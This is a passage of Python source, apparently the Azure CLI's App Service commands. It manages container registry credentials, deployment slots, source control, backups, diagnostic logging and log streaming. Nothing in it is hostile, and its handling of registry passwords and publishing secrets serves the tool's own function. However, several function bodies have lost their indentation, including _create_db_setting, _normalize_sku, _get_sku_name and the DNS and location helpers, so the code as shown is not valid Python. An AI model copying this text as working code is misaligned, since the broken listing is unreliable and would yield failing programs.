    credential lookup is attempted on a best-effort basis. Returns the masked,
    container-related app settings.
    """
    settings = []
    if docker_registry_server_url is not None:
        settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
    if (not docker_registry_server_user and not docker_registry_server_password and
            docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
        logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
        parsed = urlparse(docker_registry_server_url)
        # the url may come with or without a scheme; the registry name is the first host label
        registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
        try:
            docker_registry_server_user, docker_registry_server_password = _get_acr_cred(registry_name)
        except Exception as ex: # pylint: disable=broad-except
            logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed
    if docker_registry_server_user is not None:
        settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
    if docker_registry_server_password is not None:
        settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
    if docker_custom_image_name is not None:
        _add_linux_fx_version(resource_group_name, name, docker_custom_image_name, slot)
    if websites_enable_app_service_storage:
        settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
    if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long
        update_app_settings(resource_group_name, name, settings, slot)
    settings = get_app_settings(resource_group_name, name, slot)
    return _mask_creds_related_appsettings(_filter_for_container_settings(resource_group_name, name, settings))
def _get_acr_cred(registry_name):
    """Look up admin credentials for an Azure Container Registry by name.

    Returns a (username, password) pair. Raises CLIError when the registry
    cannot be uniquely resolved in the subscription or its admin user is
    disabled.
    """
    from azure.mgmt.containerregistry import ContainerRegistryManagementClient
    from azure.cli.core.commands.parameters import get_resources_in_subscription
    client = get_mgmt_service_client(ContainerRegistryManagementClient).registries
    result = get_resources_in_subscription('Microsoft.ContainerRegistry/registries')
    # Registry names are case-insensitive; normalize BOTH sides before comparing
    # (previously only item.name was lowercased, so a mixed-case input never matched).
    result = [item for item in result if item.name.lower() == registry_name.lower()]
    if not result or len(result) > 1:
        raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name))
    resource_group_name = parse_resource_id(result[0].id)['resource_group']
    registry = client.get(resource_group_name, registry_name)
    if registry.admin_user_enabled:  # pylint: disable=no-member
        cred = client.list_credentials(resource_group_name, registry_name)
        return cred.username, cred.passwords[0].value
    # spelling fixed: "credentails"/"credentail" -> "credentials"/"credential"
    raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
                   "credential or run 'az acr update -n {} --admin-enabled true' to enable "
                   "admin first.".format(registry_name))
def delete_container_settings(resource_group_name, name, slot=None):
    """Remove container configuration: clear linuxFxVersion and delete all DOCKER_* app settings."""
    _delete_linux_fx_version(resource_group_name, name, slot)
    delete_app_settings(resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(resource_group_name, name, slot=None):
    """Show container-related app settings with secret values masked."""
    settings = get_app_settings(resource_group_name, name, slot)
    return _mask_creds_related_appsettings(_filter_for_container_settings(resource_group_name, name, settings, slot))
def _filter_for_container_settings(resource_group_name, name, settings, slot=None):
    """Keep only container-related settings; surface linuxFxVersion as DOCKER_CUSTOM_IMAGE_NAME."""
    container_settings = [entry for entry in settings
                          if entry['name'] in CONTAINER_APPSETTING_NAMES]
    fx_version = _get_linux_fx_version(resource_group_name, name, slot).strip()
    if fx_version:
        container_settings.append({'name': 'DOCKER_CUSTOM_IMAGE_NAME',
                                   'value': fx_version})
    return container_settings
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
    """Null out secret setting values (e.g. registry passwords) before display.

    Accepts either the raw name->value dict (as used by _build_app_settings_output)
    or the list of {'name': ..., 'value': ...} records produced by
    _filter_for_container_settings. The old implementation only handled the
    dict form, so secrets in the list form were never masked.
    """
    for entry in settings:
        if isinstance(entry, dict):
            # list-of-records form: mask the 'value' field in place
            if entry.get('name') in APPSETTINGS_TO_MASK:
                entry['value'] = None
        elif entry in APPSETTINGS_TO_MASK:
            # dict form: iterating yields the setting names (keys)
            settings[entry] = None
    return settings
def add_hostname(resource_group_name, webapp_name, hostname, slot=None):
    """Bind a custom hostname to a web app (or one of its slots)."""
    client = web_client_factory()
    webapp = client.web_apps.get(resource_group_name, webapp_name)
    binding = HostNameBinding(webapp.location, site_name=webapp.name)
    if slot is not None:
        return client.web_apps.create_or_update_host_name_binding_slot(
            resource_group_name, webapp.name, hostname, binding, slot)
    return client.web_apps.create_or_update_host_name_binding(
        resource_group_name, webapp.name, hostname, binding)
def delete_hostname(resource_group_name, webapp_name, hostname, slot=None):
    """Remove a custom hostname binding from a web app (or slot)."""
    client = web_client_factory()
    if slot is None:
        return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
    # note: the slot variant takes slot BEFORE hostname
    return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(resource_group_name, webapp_name, slot=None):
    """List hostname bindings, trimming each name down to the bare hostname."""
    bindings = list(_generic_site_operation(resource_group_name, webapp_name,
                                            'list_host_name_bindings', slot))
    for binding in bindings:
        # binding names come back as 'site/hostname'; keep just the hostname part
        binding.name = binding.name.rsplit('/', 1)[-1]
    return bindings
def get_external_ip(resource_group_name, webapp_name):
    """Resolve the inbound IP address of a web app (logic ported from the portal)."""
    client = web_client_factory()
    webapp = client.web_apps.get(resource_group_name, webapp_name)
    if webapp.hosting_environment_profile:
        # App Service Environment: ask the ASE for its VIPs
        address = client.app_service_environments.list_vips(
            resource_group_name, webapp.hosting_environment_profile.name)
        if address.internal_ip_address:
            ip_address = address.internal_ip_address
        else:
            vip = next((s for s in webapp.host_name_ssl_states
                        if s.ssl_state == SslState.ip_based_enabled), None)
            ip_address = vip.virtual_ip if vip else address.service_ip_address
    else:
        # multi-tenant app: resolve the default hostname through DNS
        ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
    return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
def create_webapp_slot(resource_group_name, webapp, slot, configuration_source=None):
    """Create a deployment slot, optionally cloning configuration from the
    production site or another slot.

    configuration_source may be the webapp's own name (clone from production)
    or a slot name; slot creation does not copy app settings or connection
    strings, so they are cloned explicitly below, with slot-sticky entries
    stripped so they do not propagate.
    """
    client = web_client_factory()
    site = client.web_apps.get(resource_group_name, webapp)
    location = site.location
    slot_def = Site(server_farm_id=site.server_farm_id, location=location)
    clone_from_prod = None
    slot_def.site_config = SiteConfig()
    poller = client.web_apps.create_or_update_slot(resource_group_name, webapp, slot_def, slot)
    result = LongRunningOperation()(poller)
    if configuration_source:
        clone_from_prod = configuration_source.lower() == webapp.lower()
        site_config = get_site_configs(
            resource_group_name, webapp, None if clone_from_prod else configuration_source)
        _generic_site_operation(resource_group_name, webapp,
                                'update_configuration', slot, site_config)
    # slot create doesn't clone over the app-settings and connection-strings, so we do it here
    # also make sure slot settings don't get propagated.
    if configuration_source:
        slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
        src_slot = None if clone_from_prod else configuration_source
        app_settings = _generic_site_operation(resource_group_name, webapp,
                                               'list_application_settings',
                                               src_slot)
        for a in slot_cfg_names.app_setting_names or []:
            app_settings.properties.pop(a, None)
        connection_strings = _generic_site_operation(resource_group_name, webapp,
                                                     'list_connection_strings',
                                                     src_slot)
        for a in slot_cfg_names.connection_string_names or []:
            connection_strings.properties.pop(a, None)
        _generic_settings_operation(resource_group_name, webapp,
                                    'update_application_settings',
                                    app_settings.properties, slot, client)
        _generic_settings_operation(resource_group_name, webapp,
                                    'update_connection_strings',
                                    connection_strings.properties, slot, client)
    # result.name comes back as 'site/slot'; keep just the slot name
    result.name = result.name.split('/')[-1]
    return result
def config_source_control(resource_group_name, name, repo_url, repository_type='git', branch=None,  # pylint: disable=too-many-locals
                          manual_integration=None, git_token=None, slot=None, cd_app_type=None,
                          app_working_dir=None, nodejs_task_runner=None, python_framework=None,
                          python_version=None, cd_account_create=None, cd_project_url=None, test=None,
                          slot_swap=None, private_repo_username=None, private_repo_password=None):
    """Configure deployment source control for a web app.

    Two modes: when cd_project_url is given, continuous delivery is set up
    through VSTS; otherwise a plain SiteSourceControl binding is created
    (git or mercurial, with optional manual integration and GitHub token).
    """
    client = web_client_factory()
    location = _get_location_from_webapp(client, resource_group_name, name)
    if cd_project_url:
        # Add default values
        cd_app_type = 'AspNet' if cd_app_type is None else cd_app_type
        python_framework = 'Django' if python_framework is None else python_framework
        python_version = 'Python 3.5.3 x86' if python_version is None else python_version
        webapp_list = None if test is None else list_webapp(resource_group_name)
        vsts_provider = VstsContinuousDeliveryProvider()
        cd_app_type_details = {
            'cd_app_type': cd_app_type,
            'app_working_dir': app_working_dir,
            'nodejs_task_runner': nodejs_task_runner,
            'python_framework': python_framework,
            'python_version': python_version
        }
        status = vsts_provider.setup_continuous_delivery(resource_group_name, name, repo_url,
                                                         branch, git_token, slot_swap, cd_app_type_details,
                                                         cd_project_url, cd_account_create, location, test,
                                                         private_repo_username, private_repo_password, webapp_list)
        logger.warning(status.status_message)
        return status
    else:
        # the VSTS-only parameters make no sense without cd_project_url; reject them
        non_vsts_params = [cd_app_type, app_working_dir, nodejs_task_runner, python_framework,
                           python_version, cd_account_create, test, slot_swap]
        if any(non_vsts_params):
            raise CLIError('Following parameters are of no use when cd_project_url is None: ' +
                           'cd_app_type, app_working_dir, nodejs_task_runner, python_framework,' +
                           'python_version, cd_account_create, test, slot_swap')
        from azure.mgmt.web.models import SiteSourceControl, SourceControl
        if git_token:
            sc = SourceControl(location, source_control_name='GitHub', token=git_token)
            client.update_source_control('GitHub', sc)
        source_control = SiteSourceControl(location, repo_url=repo_url, branch=branch,
                                           is_manual_integration=manual_integration,
                                           is_mercurial=(repository_type != 'git'))
        # SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
        for i in range(5):
            try:
                poller = _generic_site_operation(resource_group_name, name,
                                                 'create_or_update_source_control',
                                                 slot, source_control)
                return LongRunningOperation()(poller)
            except Exception as ex:  # pylint: disable=broad-except
                import re
                import time
                ex = ex_handler_factory(no_throw=True)(ex)
                # for non server errors(50x), just throw; otherwise retry 4 times
                if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
                    raise
                logger.warning('retrying %s/4', i + 1)
                time.sleep(5)  # retry in a moment
def update_git_token(git_token=None):
    '''
    Update source control token cached in Azure app service. If no token is provided,
    the command will clean up existing token.
    '''
    from azure.mgmt.web.models import SourceControl
    client = web_client_factory()
    # the location value is not meaningful for this subscription-level resource
    token_payload = SourceControl('not-really-needed', source_control_name='GitHub',
                                  token=git_token or '')
    return client.update_source_control('GitHub', token_payload)
def show_source_control(resource_group_name, name, slot=None):
    """Show the source control configuration bound to the app (or slot)."""
    return _generic_site_operation(resource_group_name, name, 'get_source_control', slot)
def delete_source_control(resource_group_name, name, slot=None):
    """Remove the source control configuration from the app (or slot)."""
    return _generic_site_operation(resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(resource_group_name, name, slot=None):
    """Turn on local-git deployment for the app and return its git clone URL."""
    client = web_client_factory()
    location = _get_location_from_webapp(client, resource_group_name, name)
    site_config = SiteConfigResource(location)
    site_config.scm_type = 'LocalGit'
    if slot is not None:
        client.web_apps.create_or_update_configuration_slot(resource_group_name, name,
                                                            site_config, slot)
    else:
        client.web_apps.create_or_update_configuration(resource_group_name, name, site_config)
    return {'url': _get_local_git_url(client, resource_group_name, name, slot)}
def sync_site_repo(resource_group_name, name, slot=None):
    """Trigger a repository sync for the app (or slot)."""
    try:
        return _generic_site_operation(resource_group_name, name, 'sync_repository', slot)
    except CloudError as ex:  # Because of bad spec, sdk throws on 200. We capture it here
        if ex.status_code not in [200, 204]:
            raise ex
def list_app_service_plans(resource_group_name=None):
    """List app service plans, subscription-wide or within one resource group."""
    client = web_client_factory()
    if resource_group_name is not None:
        plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
    else:
        plans = list(client.app_service_plans.list())
    for plan in plans:
        # prune a few useless fields from the output
        for attr in ('app_service_plan_name', 'geo_region', 'subscription'):
            delattr(plan, attr)
    return plans
def _linux_sku_check(sku):
    """Raise CLIError unless the (normalized) sku is valid for a Linux plan."""
    if _get_sku_name(sku) in ('BASIC', 'STANDARD'):
        return
    raise CLIError('usage error: {0} is not a valid sku for linux plan, '
                   'please use one of the following: {1}'.format(sku, 'B1, B2, B3, S1, S2, S3'))
def create_app_service_plan(resource_group_name, name, is_linux, sku='B1', number_of_workers=None,
                            location=None):
    """Create (or update) an app service plan.

    Linux plans are restricted to BASIC/STANDARD skus; location defaults to
    the resource group's location.
    """
    client = web_client_factory()
    sku = _normalize_sku(sku)
    if location is None:
        location = _get_location_from_resource_group(resource_group_name)
    if is_linux:
        _linux_sku_check(sku)
    # the api is odd on parameter naming, have to live with it for now
    sku_def = SkuDescription(tier=_get_sku_name(sku), name=sku, capacity=number_of_workers)
    plan_def = AppServicePlan(location, app_service_plan_name=name,
                              sku=sku_def, reserved=(is_linux or None))
    return client.app_service_plans.create_or_update(resource_group_name, name, plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None,
                            admin_site_name=None):
    """Patch an app service plan in place: sku, worker count, and/or admin site name."""
    if sku is not None:
        normalized = _normalize_sku(sku)
        instance.sku.tier = _get_sku_name(normalized)
        instance.sku.name = normalized
    if number_of_workers is not None:
        instance.sku.capacity = number_of_workers
    if admin_site_name is not None:
        instance.admin_site_name = admin_site_name
    return instance
def show_backup_configuration(resource_group_name, webapp_name, slot=None):
    """Show the scheduled backup configuration; raises CLIError if none exists."""
    try:
        return _generic_site_operation(resource_group_name, webapp_name,
                                       'get_backup_configuration', slot)
    except Exception: # pylint: disable=broad-except
        # the service errors out when no backup configuration was ever set
        raise CLIError('Backup configuration not found')
def list_backups(resource_group_name, webapp_name, slot=None):
    """List backups of the web app (or slot)."""
    return _generic_site_operation(resource_group_name, webapp_name, 'list_backups',
                                   slot)
def create_backup(resource_group_name, webapp_name, storage_account_url,
                  db_name=None, db_type=None,
                  db_connection_string=None, backup_name=None, slot=None):
    """Trigger an on-demand backup of a web app (or slot) into the given storage container."""
    client = web_client_factory()
    # drop a user-supplied '.zip' extension from the backup name
    if backup_name and backup_name.lower().endswith('.zip'):
        backup_name = backup_name[:-len('.zip')]
    location = _get_location_from_webapp(client, resource_group_name, webapp_name)
    db_setting = _create_db_setting(db_name, db_type, db_connection_string)
    backup_request = BackupRequest(location, backup_request_name=backup_name,
                                   storage_account_url=storage_account_url, databases=db_setting)
    if slot:
        return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
    return client.web_apps.backup(resource_group_name, webapp_name, backup_request)
def update_backup_schedule(resource_group_name, webapp_name, storage_account_url=None,
                           frequency=None, keep_at_least_one_backup=None,
                           retention_period_in_days=None, db_name=None,
                           db_connection_string=None, db_type=None, slot=None):
    """Create or update the scheduled backup configuration of a web app.

    Arguments not supplied fall back to the values of the existing
    configuration; when no configuration exists yet, all of
    storage_account_url, frequency, retention and retain-one must be given.
    """
    client = web_client_factory()
    location = _get_location_from_webapp(client, resource_group_name, webapp_name)
    configuration = None
    try:
        configuration = _generic_site_operation(resource_group_name, webapp_name,
                                                'get_backup_configuration', slot)
    except CloudError:
        # No configuration set yet
        if not all([storage_account_url, frequency, retention_period_in_days,
                    keep_at_least_one_backup]):
            raise CLIError('No backup configuration found. A configuration must be created. ' +
                           'Usage: --container-url URL --frequency TIME --retention DAYS ' +
                           '--retain-one TRUE/FALSE')
    # If arguments were not specified, use the values in the current backup schedule.
    # NOTE: when configuration is None the all([...]) guard above ensured every
    # argument was supplied, so none of these fallbacks dereference None.
    if storage_account_url is None:
        storage_account_url = configuration.storage_account_url
    if retention_period_in_days is None:
        retention_period_in_days = configuration.backup_schedule.retention_period_in_days
    if keep_at_least_one_backup is None:
        keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
    else:
        # CLI passes this flag as the string 'true'/'false'
        keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
    if frequency:
        # Parse schedule frequency
        frequency_num, frequency_unit = _parse_frequency(frequency)
    else:
        frequency_num = configuration.backup_schedule.frequency_interval
        frequency_unit = configuration.backup_schedule.frequency_unit
    # carry over existing database settings for fields the caller did not override
    if configuration and configuration.databases:
        db = configuration.databases[0]
        db_type = db_type or db.database_type
        db_name = db_name or db.name
        db_connection_string = db_connection_string or db.connection_string
    db_setting = _create_db_setting(db_name, db_type, db_connection_string)
    backup_schedule = BackupSchedule(frequency_num, frequency_unit.name,
                                     keep_at_least_one_backup, retention_period_in_days)
    backup_request = BackupRequest(location, backup_schedule=backup_schedule, enabled=True,
                                   storage_account_url=storage_account_url, databases=db_setting)
    return _generic_site_operation(resource_group_name, webapp_name, 'update_backup_configuration',
                                   slot, backup_request)
def restore_backup(resource_group_name, webapp_name, storage_account_url, backup_name,
                   db_name=None, db_type=None, db_connection_string=None,
                   target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
    """Restore a web app from a named backup blob in the given storage container."""
    client = web_client_factory()
    storage_blob_name = backup_name
    webapp_info = client.web_apps.get(resource_group_name, webapp_name)
    # the plan name is the last segment of the server farm resource id
    app_service_plan = webapp_info.server_farm_id.split('/')[-1]
    if not storage_blob_name.lower().endswith('.zip'):
        storage_blob_name += '.zip'
    location = _get_location_from_webapp(client, resource_group_name, webapp_name)
    db_setting = _create_db_setting(db_name, db_type, db_connection_string)
    restore_request = RestoreRequest(location, storage_account_url=storage_account_url,
                                     blob_name=storage_blob_name, overwrite=overwrite,
                                     site_name=target_name, databases=db_setting,
                                     ignore_conflicting_host_names=ignore_hostname_conflict,
                                     app_service_plan=app_service_plan)
    # NOTE(review): the positional 0 appears to be the backup id expected by the
    # SDK's restore operations — TODO confirm against the SDK signature.
    if slot:
        return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
    return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)
def _create_db_setting(db_name, db_type, db_connection_string):
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(db_type, db_name, connection_string=db_connection_string)]
elif any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
def _parse_frequency(frequency):
    """Parse a backup frequency string such as '7d' or '12h'.

    Returns (interval, FrequencyUnit). Raises CLIError for a missing/bad unit
    suffix, a non-numeric interval, or a non-positive interval.
    """
    # guard the empty string: frequency[-1] below would raise IndexError otherwise
    if not frequency:
        raise CLIError('Frequency must end with d or h for "day" or "hour"')
    unit_part = frequency.lower()[-1]
    if unit_part == 'd':
        frequency_unit = FrequencyUnit.day
    elif unit_part == 'h':
        frequency_unit = FrequencyUnit.hour
    else:
        raise CLIError('Frequency must end with d or h for "day" or "hour"')
    try:
        frequency_num = int(frequency[:-1])
    except ValueError:
        raise CLIError('Frequency must start with a number')
    # was "< 0", which let a zero interval through despite the message
    if frequency_num <= 0:
        raise CLIError('Frequency must be positive')
    return frequency_num, frequency_unit
def _normalize_sku(sku):
sku = sku.upper()
if sku == 'FREE':
return 'F1'
elif sku == 'SHARED':
return 'D1'
return sku
def _get_sku_name(tier):
tier = tier.upper()
if tier == 'F1':
return 'FREE'
elif tier == 'D1':
return 'SHARED'
elif tier in ['B1', 'B2', 'B3']:
return 'BASIC'
elif tier in ['S1', 'S2', 'S3']:
return 'STANDARD'
elif tier in ['P1', 'P2', 'P3', 'P1V2', 'P2V2', 'P3V2']:
return 'PREMIUM'
else:
raise CLIError("Invalid sku(pricing tier), please refer to command help for valid values")
def _get_location_from_resource_group(resource_group_name):
    """Return the Azure location of the given resource group."""
    from azure.mgmt.resource import ResourceManagementClient
    resource_client = get_mgmt_service_client(ResourceManagementClient)
    return resource_client.resource_groups.get(resource_group_name).location
def _get_location_from_webapp(client, resource_group_name, webapp):
webapp = client.web_apps.get(resource_group_name, webapp)
return webapp.location
def _get_local_git_url(client, resource_group_name, name, slot=None):
    """Compose the credential-embedded local-git clone URL for the app."""
    user = client.get_publishing_user()
    source_control = _generic_site_operation(resource_group_name, name, 'get_source_control', slot)
    parsed = urlparse(source_control.repo_url)
    return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
                                      parsed.netloc, name)
def _get_scm_url(resource_group_name, name, slot=None):
    """Return the https URL of the app's SCM (repository) host."""
    from azure.mgmt.web.models import HostType
    webapp = show_webapp(resource_group_name, name, slot=slot)
    scm_host = next((h.name for h in webapp.host_name_ssl_states or []
                     if h.host_type == HostType.repository), None)
    if scm_host is None:
        # this should not happen, but throw anyway
        raise ValueError('Failed to retrieve Scm Uri')
    return "https://{}".format(scm_host)
def set_deployment_user(user_name, password=None):
    '''
    Update deployment credentials.(Note, all webapps in your subscription will be impacted)
    '''
    client = web_client_factory()
    deployment_user = User()
    deployment_user.publishing_user_name = user_name
    if password is None:
        # prompt interactively; fail cleanly when there is no TTY
        try:
            password = prompt_pass(msg='Password: ', confirm=True)
        except NoTTYException:
            raise CLIError('Please specify both username and password in non-interactive mode.')
    deployment_user.publishing_password = password
    return client.update_publishing_user(deployment_user)
def list_publish_profiles(resource_group_name, name, slot=None):
    """Return the app's publishing profiles (including secrets) as a list of dicts."""
    import xmltodict
    content = _generic_site_operation(resource_group_name, name,
                                      'list_publishing_profile_xml_with_secrets', slot)
    full_xml = ''
    for f in content:
        full_xml += f.decode()
    profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
    # xmltodict returns a bare dict (not a list) when there is exactly one
    # <publishProfile> element; iterating that dict would yield its keys.
    if not isinstance(profiles, list):
        profiles = [profiles]
    converted = []
    for profile in profiles:
        # strip the leading '@' xmltodict put in for attributes
        converted.append({key.lstrip('@'): value for key, value in profile.items()})
    return converted
def enable_cd(resource_group_name, name, enable, slot=None):
    """Toggle Docker continuous deployment and return the CI/CD webhook URL info."""
    update_app_settings(resource_group_name, name, ['DOCKER_ENABLE_CI=' + enable], slot)
    return show_container_cd_url(resource_group_name, name, slot)
def show_container_cd_url(resource_group_name, name, slot=None):
    """Report whether Docker CI is enabled and, when it is, the webhook URL to configure."""
    app_settings = get_app_settings(resource_group_name, name, slot)
    docker_enabled = any(s['name'] == 'DOCKER_ENABLE_CI' and s['value'] == 'true'
                         for s in app_settings)
    cd_settings = {'DOCKER_ENABLE_CI': docker_enabled}
    if not docker_enabled:
        cd_settings['CI_CD_URL'] = ''
        return cd_settings
    for profile in list_publish_profiles(resource_group_name, name, slot):
        if profile['publishMethod'] == 'MSDeploy':
            scm_url = profile['publishUrl'].replace(":443", "")
            cd_settings['CI_CD_URL'] = ('https://' + profile['userName'] + ':' +
                                        profile['userPWD'] + '@' + scm_url + '/docker/hook')
            break
    return cd_settings
def view_in_browser(resource_group_name, name, slot=None, logs=False):
    """Open the app's default hostname in a browser; optionally tail its log stream."""
    site = _generic_site_operation(resource_group_name, name, 'get', slot)
    # prefer https when any hostname has SSL enabled
    has_ssl = any(h.ssl_state != SslState.disabled for h in site.host_name_ssl_states)
    scheme = 'https' if has_ssl else 'http'
    _open_page_in_browser(scheme + '://' + site.default_host_name)
    if logs:
        get_streaming_log(resource_group_name, name, provider=None, slot=slot)
def _open_page_in_browser(url):
    """Open *url* in the user's default browser, working around macOS quirks."""
    import sys
    if sys.platform.lower() == 'darwin':
        # handle 2 things:
        # a. On OSX sierra, 'python -m webbrowser -t <url>' emits out "execution error: <url> doesn't
        #    understand the "open location" message"
        # b. Python 2.x can't sniff out the default browser
        import subprocess
        subprocess.Popen(['open', url])
    else:
        import webbrowser
        webbrowser.open(url, new=2)  # 2 means: open in a new tab, if possible
# TODO: expose new blob support
def config_diagnostics(resource_group_name, name, level=None,
                       application_logging=None, web_server_logging=None,
                       docker_container_logging=None, detailed_error_messages=None,
                       failed_request_tracing=None, slot=None):
    """Configure the app's diagnostic logging (application, web server,
    detailed errors, failed request tracing).

    Each category is left untouched (None) unless its argument is supplied.
    """
    from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
                                       SiteLogsConfig, HttpLogsConfig, FileSystemHttpLogsConfig,
                                       EnabledConfig)
    client = web_client_factory()
    # TODO: ensure we call get_site only once
    site = client.web_apps.get(resource_group_name, name)
    location = site.location
    application_logs = None
    if application_logging is not None:
        if not application_logging:
            level = 'Off'
        elif level is None:
            level = 'Error'
        fs_log = FileSystemApplicationLogsConfig(level)
        application_logs = ApplicationLogsConfig(fs_log)
    http_logs = None
    server_logging_option = web_server_logging or docker_container_logging
    if server_logging_option:
        # TODO: az blob storage log config currently not in use, will be impelemented later.
        # Tracked as Issue: #4764 on Github
        filesystem_log_config = None
        turned_on = server_logging_option != 'off'
        if server_logging_option in ['filesystem', 'off']:
            # 100 mb max log size, retention lasts 3 days. Yes we hard code it, portal does too
            filesystem_log_config = FileSystemHttpLogsConfig(100, 3, enabled=turned_on)
        http_logs = HttpLogsConfig(filesystem_log_config, None)
    detailed_error_messages_logs = (None if detailed_error_messages is None
                                    else EnabledConfig(detailed_error_messages))
    failed_request_tracing_logs = (None if failed_request_tracing is None
                                   else EnabledConfig(failed_request_tracing))
    site_log_config = SiteLogsConfig(location,
                                     application_logs=application_logs,
                                     http_logs=http_logs,
                                     failed_requests_tracing=failed_request_tracing_logs,
                                     detailed_error_messages=detailed_error_messages_logs)
    return _generic_site_operation(resource_group_name, name, 'update_diagnostic_logs_config',
                                   slot, site_log_config)
def show_diagnostic_settings(resource_group_name, name, slot=None):
    """Show the app's (or slot's) diagnostic logging configuration."""
    return _generic_site_operation(resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
def config_slot_auto_swap(resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
    """Enable or disable auto-swap on a deployment slot (default target: production)."""
    client = web_client_factory()
    site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
    if disable:
        site_config.auto_swap_slot_name = ''
    else:
        site_config.auto_swap_slot_name = auto_swap_slot or 'production'
    return client.web_apps.update_configuration_slot(resource_group_name, webapp, site_config, slot)
def list_slots(resource_group_name, webapp):
    """List deployment slots, trimming names and surfacing the plan name."""
    client = web_client_factory()
    slots = list(client.web_apps.list_slots(resource_group_name, webapp))
    for item in slots:
        # slot names come back as 'site/slot'; keep just the slot part
        item.name = item.name.rsplit('/', 1)[-1]
        setattr(item, 'app_service_plan', parse_resource_id(item.server_farm_id)['name'])
        del item.server_farm_id
    return slots
def swap_slot(resource_group_name, webapp, slot, target_slot=None, action='swap'):
    """Swap a deployment slot with production (or another slot).

    action is one of 'swap' (perform the swap), 'preview' (apply the target's
    config to the source for validation), or anything else to reset a pending
    preview on both slots. target_slot=None means the production slot.
    """
    client = web_client_factory()
    if action == 'swap':
        if target_slot is None:
            poller = client.web_apps.swap_slot_with_production(resource_group_name,
                                                               webapp, slot, True)
        else:
            poller = client.web_apps.swap_slot_slot(resource_group_name, webapp,
                                                    slot, target_slot, True)
        return poller
    elif action == 'preview':
        if target_slot is None:
            result = client.web_apps.apply_slot_config_to_production(resource_group_name,
                                                                     webapp, slot, True)
        else:
            result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp,
                                                                   slot, target_slot, True)
        return result
    else:  # reset
        # we will reset both source slot and target slot
        if target_slot is None:
            client.web_apps.reset_production_slot_config(resource_group_name, webapp)
        else:
            client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
        client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, slot)
        return None
def delete_slot(resource_group_name, webapp, slot):
    """Delete a single deployment slot of a web app."""
    # TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
    web_client_factory().web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(resource_group_name, name, distribution):
    """Set traffic ramp-up rules from 'slot=percentage' strings and return them."""
    client = web_client_factory()
    site = client.web_apps.get(resource_group_name, name)
    configs = get_site_configs(resource_group_name, name)
    # Everything after the first label of the default host name, e.g. '.azurewebsites.net'.
    host_name_suffix = '.' + site.default_host_name.split('.', 1)[1]
    rules = []
    for entry in distribution:
        slot, percentage = entry.split('=')
        rules.append(RampUpRule(action_host_name=slot + host_name_suffix,
                                reroute_percentage=float(percentage),
                                name=slot))
    configs.experiments.ramp_up_rules = rules
    _generic_site_operation(resource_group_name, name, 'update_configuration', None, configs)
    return configs.experiments.ramp_up_rules
def show_traffic_routing(resource_group_name, name):
    """Return the currently configured traffic ramp-up rules."""
    return get_site_configs(resource_group_name, name).experiments.ramp_up_rules
def clear_traffic_routing(resource_group_name, name):
    """Remove all traffic ramp-up rules by setting an empty distribution."""
    set_traffic_routing(resource_group_name, name, [])
def get_streaming_log(resource_group_name, name, provider=None, slot=None):
    """Tail the site's live log stream on stdout; blocks until interrupted."""
    import time
    scm_url = _get_scm_url(resource_group_name, name, slot)
    streaming_url = scm_url + '/logstream'
    if provider:
        streaming_url += ('/' + provider.lstrip('/'))
    client = web_client_factory()
    user, password = _get_site_credential(client, resource_group_name, name)
    worker = threading.Thread(target=_get_log, args=(streaming_url, user, password))
    worker.daemon = True
    worker.start()
    while True:
        time.sleep(100)  # keep the main thread alive so that ctrl+c can stop the command
def download_historical_logs(resource_group_name, name, log_file=None, slot=None):
    """Download the site's historical log dump from Kudu into *log_file*."""
    scm_url = _get_scm_url(resource_group_name, name, slot)
    dump_url = scm_url.rstrip('/') + '/dump'
    client = web_client_factory()
    user_name, password = _get_site_credential(client, resource_group_name, name)
    _get_log(dump_url, user_name, password, log_file)
    logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(client, resource_group_name, name):
    """Return the site's (publishing_user_name, publishing_password) pair."""
